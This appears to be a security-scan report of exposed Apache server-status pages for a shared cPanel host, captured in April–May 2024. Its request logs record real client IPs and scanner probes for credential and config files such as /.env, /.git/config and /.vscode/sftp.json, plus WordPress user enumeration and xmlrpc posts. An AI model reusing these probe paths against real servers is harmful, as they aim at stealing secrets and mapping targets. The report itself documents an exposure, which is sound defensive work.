      175.110.230.119http/1.1trydaris.com:443GET /ar/index.php/wp-json/wp/v2/taxonomies?context=edit&per_pag
      
      1-0-0/0/630.
      0.0054474234538690.00.00149
      Found on 2024-05-01 02:52
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7e4bb6a13

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Monday, 29-Apr-2024 04:10:21 +03
      Restart Time: Thursday, 18-Apr-2024 04:05:06 +03
      Parent Server Config. Generation: 15
      Parent Server MPM Generation: 14
      Server uptime:  11 days 5 minutes 15 seconds
      Server load: 0.39 0.37 0.36
      Total accesses: 3677124 - Total Traffic: 397.4 GB - Total Duration: 3883525216
      CPU Usage: u475.97 s26.83 cu18436.3 cs2587.07 - 2.26% CPU load
      3.87 requests/sec - 438.3 kB/second - 113.3 kB/request - 1056.13 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 213 idle workers
      ________________________W____________________W_______________K__
      ___________........................._____________________K______
      ___K________________W_______K_________W____________K______W_____
      _______________________________K________________________K_......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-14256880/36/19200_
      6.962661139459770.07.932209.33
      85.208.96.196http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-14256880/92/19186_
      6.8813967484546770.00.611984.28
      167.172.158.128http/1.1
      
      0-14256880/64/19750_
      7.001332116581970.02.351705.77
      167.172.158.128http/1.1white-petals.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      0-14256880/35/20084_
      7.05464145454570.01.101896.00
      217.113.194.242http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1602&t=217.113.194.121&c=5 HT
      
      0-14256880/57/19056_
      6.9145433146966650.03.211887.33
      179.43.167.18http/1.1zed.sa:443GET //submit_post.js HTTP/1.1
      
      0-14256880/44/19330_
      6.953141107542240.02.701950.97
      157.245.36.108http/1.1randalift.com.sa:80GET /.env HTTP/1.1
      
      0-14256880/46/17990_
      7.0602164880470.01.602150.27
      162.158.110.12http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-14256880/149/19095_
      7.011164136589550.02.272250.95
      217.113.194.245http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1696&t=217.113.194.70&c=5 HTT
      
      0-14256880/217/18099_
      6.933795202557700.07.562481.45
      217.113.194.252http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1518&t=217.113.194.242&c=5 HT
      
      0-14256880/36/19580_
      6.90910103716940.00.162107.56
      199.47.82.20http/1.1
      
      0-14256880/51/20443_
      6.923995100103630.010.712428.34
      217.113.194.251http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1716&t=217.113.194.121&c=5 HT
      
      0-14256880/60/19664_
      6.981674104784590.01.972541.21
      217.113.194.247http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1330&t=217.113.194.100&c=5 HT
      
      0-14256880/53/18416_
      6.9530128425470080.01.982209.96
      66.249.70.5http/1.1jawad.com.sa:443GET /ar HTTP/1.1
      
      0-14256880/53/18857_
      6.8714089164362130.019.402754.49
      167.172.158.128http/1.1
      
      0-14256880/35/18521_
      6.962171118023200.01.581888.63
      216.244.66.242http/1.1jawad.com.sa:80GET /robots.txt HTTP/1.1
      
      0-14256880/74/18826_
      7.06172106946150.058.581853.98
      172.70.247.162http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-14256880/54/19357_
      7.001365142704700.016.161718.26
      217.113.194.254http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1330&t=154.54.249.208&c=5 HTT
      
      0-14256880/58/18940_
      6.943434117479750.07.411855.06
      40.77.167.65http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=198 HTTP/1.1
      
      0-14256880/58/18913_
      6.991361129136790.043.361761.58
      167.172.158.128http/1.1white-petals.com:443GET /about HTTP/1.1
      
      0-14256880/94/19329_
      6.991411111602600.018.131757.09
      165.22.235.3http/1.1abu-helal.com:80GET / HTTP/1.1
      
      0-14256880/37/19802_
      6.943211304570380.02.612115.01
      157.245.36.108http/1.1randalift.com.sa:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-14256880/85/19431_
      6.9143731122658670.03.032038.52
      179.43.167.18http/1.1sibaqulhorof.com:443GET //login.js HTTP/1.1
      
      0-14256880/51/18988_
      7.0466568126904340.04.032280.52
      52.167.144.186http/1.1albayan.edu.sa:443GET /imgweb/6/grammar_pb.pdf HTTP/1.1
      
      0-14256880/41/18083_
      6.981702153785250.010.481937.26
      95.185.91.182http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-14256880/32/18702W
      6.3610340246095770.073.862381.80
      51.36.220.157http/1.1albayan.edu.sa:443GET /imgweb/1/sincestd1.pdf HTTP/1.1
      
      1-14255070/67/19343_
      7.151361155512130.05.442386.77
      167.172.158.128http/1.1white-petals.com:443GET /.vscode/sftp.json HTTP/1.1
      
      1-14255070/46/20241_
      7.3454154979730.00.602048.01
      217.113.194.251http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1615&t=217.113.194.100&c=5 HT
      
      1-14255070/44/18649_
      6.9523536170281960.00.992363.53
      185.191.171.2http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?i_f=1282&page=1&user=web HTTP/1.1
      
      1-14255070/55/18848_
      6.943171143065640.03.671926.53
      157.245.36.108http/1.1randalift.com.sa:80GET /_all_dbs HTTP/1.1
      
      1-14255070/164/18611_
      7.337944173399470.032.221683.84
      34.140.108.54http/1.13dvi.com:443GET / HTTP/1.1
      
      1-14255070/76/18721_
      6.9426990136618300.01.041876.30
      185.184.155.49http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      1-14255070/81/19488_
      6.933542158106060.09.692406.11
      157.245.36.108http/1.1php.we3dvi.com:80\x16\x03\x01\x01\x07\x01
      
      1-14255070/41/18719_
      7.34364133780810.016.152037.
      Found on 2024-04-29 01:09
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7d7550a86

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Sunday, 28-Apr-2024 22:27:41 +03
      Restart Time: Thursday, 18-Apr-2024 04:05:06 +03
      Parent Server Config. Generation: 14
      Parent Server MPM Generation: 13
      Server uptime:  10 days 18 hours 22 minutes 35 seconds
      Server load: 0.22 0.35 0.40
      Total accesses: 3641627 - Total Traffic: 390.1 GB - Total Duration: 3843340893
      CPU Usage: u596.48 s67.26 cu18160.7 cs2475.43 - 2.29% CPU load
      3.92 requests/sec - 439.8 kB/second - 112.3 kB/request - 1055.39 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 140 idle workers
      _____________________K_W___K_______________________________K____
      ___K_______.........................________K______________K____
      _________________R___K____K____________________.................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-13296950/88/18936_
      16.751181139300760.028.562196.33
      146.190.63.48http/1.1akgsa.com:443GET /.vscode/sftp.json HTTP/1.1
      
      0-13296950/141/19014_
      16.221543582970320.053.681966.53
      68.183.13.217http/1.1
      
      0-13296950/121/19593_
      16.6919338115431900.098.111661.59
      5.109.72.59http/1.1albayan.edu.sa:443GET /web/470.html2 HTTP/1.1
      
      0-13296950/112/19889_
      16.751157144332650.023.051850.88
      156.207.6.63http/1.13dvi.com:443GET /v/sibaqulhorof/ HTTP/1.1
      
      0-13296950/112/18907_
      16.8543112146599080.055.431879.65
      151.254.246.150http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-13296950/131/19161_
      16.84632103789040.036.631868.12
      178.73.119.233http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/close_video_bg.png
      
      0-13296950/115/17798_
      16.761121161144900.028.972116.58
      146.190.63.48http/1.1akgsa.com:443GET /config.json HTTP/1.1
      
      0-13296950/161/18835_
      16.091542135653420.087.752234.15
      68.183.13.217http/1.1
      
      0-13296950/95/17743_
      16.741251201795420.017.882470.49
      206.81.24.74http/1.1akgsa.com:443GET /config.json HTTP/1.1
      
      0-13296950/92/19411_
      16.521242102355770.086.102057.88
      146.190.63.48http/1.1
      
      0-13296950/111/20254_
      16.74125097835990.058.872351.69
      206.81.24.74http/1.1akgsa.com:443GET /login.action HTTP/1.1
      
      0-13296950/137/19524_
      16.65310998517540.041.792473.05
      95.186.97.82http/1.1
      
      0-13296950/92/18257_
      16.481271423080340.05.892198.52
      206.81.24.74http/1.1
      
      0-13296950/157/18710_
      16.73134282162524060.021.592707.77
      40.77.167.60http/1.1albayan.edu.sa:443GET /imgweb/daleltandemi.pdf HTTP/1.1
      
      0-13296950/108/18383_
      16.69191208115911600.068.321779.50
      51.223.56.111http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%B9%D9%84%
      
      0-13296950/113/18596_
      16.691630106532510.046.071782.72
      40.77.167.60http/1.1albayan.edu.sa:80GET /web/61.html2 HTTP/1.1
      
      0-13296950/122/19116_
      16.751151142311930.09.201693.10
      146.190.63.48http/1.1akgsa.com:443GET /login.action HTTP/1.1
      
      0-13296950/67/18755_
      16.481281115923190.0126.941803.01
      206.81.24.74http/1.1
      
      0-13296950/75/18748_
      16.797859127117880.041.991678.87
      51.223.56.111http/1.1albayan.edu.sa:443GET /web/472.html2 HTTP/1.1
      
      0-13296950/113/19131_
      16.741251111177950.054.621703.71
      206.81.24.74http/1.1akgsa.com:443GET /.vscode/sftp.json HTTP/1.1
      
      0-13296950/115/19683_
      16.80703304454030.016.102109.30
      51.223.56.111http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%B1%D9%8A%
      
      0-13296951/97/19236K
      16.8511122351480.835.881942.66
      172.70.163.55http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-13296950/92/18798_
      16.788771124407420.0133.882241.79
      51.223.56.111http/1.1albayan.edu.sa:443GET /web/250.html2 HTTP/1.1
      
      0-13296950/103/17894W
      16.6800152426080.047.841911.08
      172.71.178.175http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-13296950/155/18580_
      16.7216021244575350.07.642296.02
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      1-13275730/137/19072_
      20.291272154750350.057.752370.27
      206.81.24.74http/1.1akgsa.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      1-13275730/134/20094_
      20.0612390327154794270.0118.462044.07
      146.190.63.48http/1.1
      
      1-13275731/196/18523K
      20.4001169461350.825.482343.23
      172.71.178.209http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      1-13275730/119/18612_
      20.031271141970210.024.421897.13
      206.81.24.74http/1.1
      
      1-13275730/119/18331_
      20.20292172914100.074.021630.29
      51.223.56.111http/1.1
      
      1-13275730/142/18512_
      20.336773136057460.088.301851.23
      188.52.203.82http/1.1albayan.edu.sa:443GET /web/38.html HTTP/1.1
      
      1-13275730/183/19259_
      20.301161157783230.039.412384.33
      146.190.63.48http/1.1akgsa.com:443GET /.DS_Store HTTP/1.1
      
      1-13275730/153/18516_
      20.37632130445020.089.552002.60
      178.73.119.233http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/thumb_bg.png HTTP/
      
      1-13275730/180/18211_
      20.2418234335391340990.029.252105.46
      51.235.99.151http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%A3%D8%B
      Found on 2024-04-28 19:27
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7c63befdc

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr 16 2024 19:56:13
      
      Current Time: Friday, 19-Apr-2024 00:48:43 +03
      Restart Time: Thursday, 18-Apr-2024 04:05:06 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  20 hours 43 minutes 37 seconds
      Server load: 0.27 0.32 0.36
      Total accesses: 100013 - Total Traffic: 18.5 GB - Total Duration: 153860886
      CPU Usage: u429.42 s88.83 cu0 cs0 - .695% CPU load
      1.34 requests/sec - 260.1 kB/second - 194.1 kB/request - 1538.41 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 192 idle workers
      _K_K__________________________________________K_W_____K_________
      _____________________________________K__________________________
      ______K_______________W_________________________________________
      ________........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-013450/451/451_
      61.1918635248770.0163.89163.89
      2.90.88.223http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-013451/603/603K
      61.40123720238.0108.00108.00
      2.90.245.29http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-013450/539/539_
      60.9524262804380.077.9477.94
      157.245.105.107http/1.1
      
      0-013452/486/486K
      61.392118890567.693.4993.49
      172.71.103.139http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-013450/458/458_
      60.93266212896670.052.1152.11
      153.0.80.216http/1.1
      
      0-013450/438/438_
      60.9227592407130.047.0647.06
      111.172.5.240http/1.1
      
      0-013450/497/497_
      61.25145653486250.068.6668.66
      f20a02ce01.scan.leakix.orghttp/1.1randalift.com.sa:80GET /server-status HTTP/1.1
      
      0-013450/442/442_
      61.1917673229480.070.8970.89
      64.226.78.121http/1.1alnwisher.com:80GET / HTTP/1.1
      
      0-013450/424/424_
      61.1723315067150.0111.17111.17
      157.245.105.107http/1.1abu-helal.com:443GET /config.json HTTP/1.1
      
      0-013450/538/538_
      60.9131911721200.0162.91162.91
      199.203.249.126http/1.1
      
      0-013450/418/418_
      61.383603128440.032.1232.12
      31.13.103.116http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=593&l_n=1&page=1 HTTP/
      
      0-013450/445/445_
      61.20152323634600.0180.36180.36
      20.26.44.170http/1.1akg.sa:443GET /blog/view/878 HTTP/1.1
      
      0-013450/483/483_
      61.182052329199180.060.8160.81
      2.90.88.223http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-013450/624/624_
      61.386412142850.0203.98203.98
      123.245.129.124http/1.1jawad.com.sa:443GET /public/admin_resources/js/script.js HTTP/1.1
      
      0-013450/472/472_
      61.384309288760.0126.09126.09
      172.70.46.23http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-013450/497/497_
      60.9425982127830.058.7258.72
      2.90.88.223http/1.1
      
      0-013450/597/597_
      61.393813709560.042.2142.21
      2.90.88.215http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      0-013450/457/457_
      61.1820091681750.0122.60122.60
      91.201.114.232http/1.1garndhabi.org:443GET /plugins/jquery/jquery-1.11.3.min.js HTTP/1.1
      
      0-013450/489/489_
      60.9424508251420.0193.08193.08
      157.245.105.107http/1.1
      
      0-013450/602/602_
      61.1130011643670.059.0959.09
      185.240.64.68http/1.13dvi.com:443GET /favicon.ico HTTP/1.1
      
      0-013450/521/521_
      61.2514213060820.080.9280.92
      142.93.129.190http/1.1randalift.com.sa:80GET /telescope/requests HTTP/1.1
      
      0-013450/489/489_
      61.2710615822850.0111.91111.91
      2.90.88.223http/1.1albayan.edu.sa:443GET /imgweb/file43/teaching%20jobs%20available.png HTTP/1.1
      
      0-013450/492/492_
      61.2015717174420.079.6679.66
      64.226.78.121http/1.1alnwisher.com:80GET /_all_dbs HTTP/1.1
      
      0-013450/377/377_
      61.172371985607870.0137.19137.19
      f894f8ec11.scan.leakix.orghttp/1.1abu-helal.com:443GET /server-status HTTP/1.1
      
      0-013450/586/586_
      61.20155113722300.0130.83130.83
      64.226.78.121http/1.1alnwisher.com:80GET /server HTTP/1.1
      
      1-013460/602/602_
      62.433816507150.059.4759.47
      2.90.88.215http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font1/DroidKufi-Bold.woff HTTP/1.1
      
      1-013460/461/461_
      62.39155010699490.0120.57120.57
      64.226.78.121http/1.1alnwisher.com:80GET /login.action HTTP/1.1
      
      1-013460/639/639_
      62.39157111205290.0145.32145.32
      64.226.78.121http/1.1alnwisher.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      1-013460/447/447_
      62.39145111947370.0148.53148.53
      142.93.129.190http/1.1randalift.com.sa:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-013460/486/486_
      62.212452102638320.0120.98120.98
      157.245.105.107http/1.1
      
      1-013460/614/614_
      62.38221194335250.0126.91126.91
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      1-013460/521/521_
      62.425522620430.0130.91130.91
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      1-013460/598/598_
      62.2027615768230.067.4767.47
      175.153.190.112http/1.1
      
      1-013460/442/442_
      62.36234174005770.078.6078.60
      157.245.105.107http/1.1abu-helal.com:443GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      1-013460/516/516_
      62.43<
      Found on 2024-04-18 21:47
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df748c0b251

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr  8 2024 11:46:34
      
      Current Time: Wednesday, 10-Apr-2024 20:27:47 +03
      Restart Time: Tuesday, 09-Apr-2024 04:04:48 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 day 16 hours 22 minutes 59 seconds
      Server load: 0.13 0.25 0.30
      Total accesses: 154372 - Total Traffic: 14.4 GB - Total Duration: 131544305
      CPU Usage: u472.11 s81.24 cu98.12 cs20.22 - .462% CPU load
      1.06 requests/sec - 103.9 kB/second - 97.9 kB/request - 852.125 ms/request
      7 requests currently being processed, 0 workers gracefully restarting, 143 idle workers
      ___________W____K_________________K_____________________________
      K_________________________K________________W_________________...
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ............................._________K_______________..........
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0214490/1084/1216_
      94.8921446824010.077.7885.54
      152.89.160.109http/1.1
      
      0-0214490/988/1099_
      95.084511312810600.045.02111.69
      139-162-210-205.ip.linodeusercontent.comhttp/1.1abu-helal.com:80GET /server-status HTTP/1.1
      
      0-0214490/951/1173_
      95.183782240300.048.7665.70
      162.158.179.6http/1.1adyar.com.sa:443GET / HTTP/1.1
      
      0-0214490/1032/1310_
      95.15228814461140.093.01108.21
      114.119.128.40http/1.13dvi.com:443GET /images/folio/thumbs/545340618584305.jpg HTTP/1.1
      
      0-0214490/920/1099_
      94.8726532996120.0111.60120.20
      167.114.209.103http/1.1
      
      0-0214490/902/1184_
      95.1140223518780.082.76103.23
      5.163.42.91http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-0214490/1300/1534_
      94.7531713052990.0120.43133.19
      207.231.107.133http/1.1
      
      0-0214490/1052/1325_
      95.171011345664130.097.38105.81
      172.70.38.248http/1.1support.daaris.com:443GET /cart.php?a=add&domain=transfer&language=portuguese-pt HTTP
      
      0-0214490/860/1127_
      95.0944504458950.058.8667.84
      54.36.148.38http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=4&q=375&t=54.36.150.81&c=5 HTTP/
      
      0-0214490/1087/1220_
      95.14307264451670.0143.01160.98
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1712769759.75474309921264648437
      
      0-0214490/880/1047_
      94.941563164728160.0104.36116.09
      199.45.155.38http/1.1
      
      0-0214490/828/1216W
      92.74345803731820.0121.41130.22
      35.222.190.7http/1.1akg.sa:443GET /_next/webpack-hmr HTTP/1.1
      
      0-0214490/1155/1278_
      95.142731022711190.089.43103.14
      167.114.209.103http/1.1sulaimaniya.edu.sa:80GET / HTTP/1.1
      
      0-0214490/1063/1274_
      94.7726983795140.0157.94188.10
      167.114.209.103http/1.1
      
      0-0214490/1038/1273_
      95.18806707810.058.8371.22
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-0214490/941/1167_
      95.1239625319220.0101.86137.55
      5.163.79.105http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-0214491/735/929K
      95.19015767470.851.7367.64
      172.70.46.212http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-0214490/1202/1455_
      95.0944912453810.082.83103.45
      139.162.210.205http/1.1abu-helal.com:80GET /.git/config HTTP/1.1
      
      0-0214490/1014/1177_
      95.1517423819090.0101.79125.00
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1712769892.77692604064941406250
      
      0-0214490/938/1039_
      94.4936216320450.065.1475.88
      5.163.63.101http/1.1
      
      0-0214490/905/1072_
      95.1614822401870.0188.89197.70
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-0214490/1036/1210_
      95.09419143860930.0101.51111.72
      203.2.64.59http/1.1jawad.com.sa:443GET /ar HTTP/1.1
      
      0-0214490/875/1020_
      95.1433522471980.072.3682.66
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1712769731.94707489013671875000
      
      0-0214490/1041/1247_
      95.1338317287920.0148.35172.26
      188.54.55.214http/1.13dvi.com:443GET /favicon.ico HTTP/1.1
      
      0-0214490/772/1110_
      94.6721283046240.0146.29167.04
      152.89.160.109http/1.1
      
      1-0214790/991/1105_
      91.7243624968820.0119.14123.82
      52.167.144.216http/1.1albayan.edu.sa:443GET /imgweb/log3.pdf HTTP/1.1
      
      1-0214790/804/1051_
      91.7627424692920.0157.04185.61
      138.201.201.48http/1.1sulaimaniya.edu.sa:80POST /wp-cron.php?doing_wp_cron=1712769793.10049891471862792968
      
      1-0214790/847/1015_
      91.7045213080530.054.3775.37
      139.162.210.205http/1.1abu-helal.com:80GET /.vscode/sftp.json HTTP/1.1
      
      1-0214790/1186/1393_
      91.772693482585200.0124.50172.14
      216.244.66.235http/1.1zed.sa:80GET /product/lobster-trio/?lang=ar HTTP/1.1
      
      1-0214790/1034/1347_
      91.7535313992560.0121.75132.81
      66.249.64.13http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      1-0214790/892/1069_
      91.7045112777470.0129.65149.12
      139.162.210.205http/1.1abu-helal.com:80GET /login.action HTTP/1.1
      
      1-0214790/914/1191_
      91.352657232308860.066.3587.11
      167.114.209.103http/1.1
      
      1-0214790/866/1039_
      90.9730917011780.048.0959.62
      24.42.67.177http/1.1
      
      1-0214790/1036/1180_
      91.75384967542270.058.9166.32
      85.208.96.196http/1.1daris.live:80GET /category/Communications HTTP/1.1
      
      
      Found on 2024-04-10 17:27
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7094015d9

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: Apr  8 2024 11:46:34
      
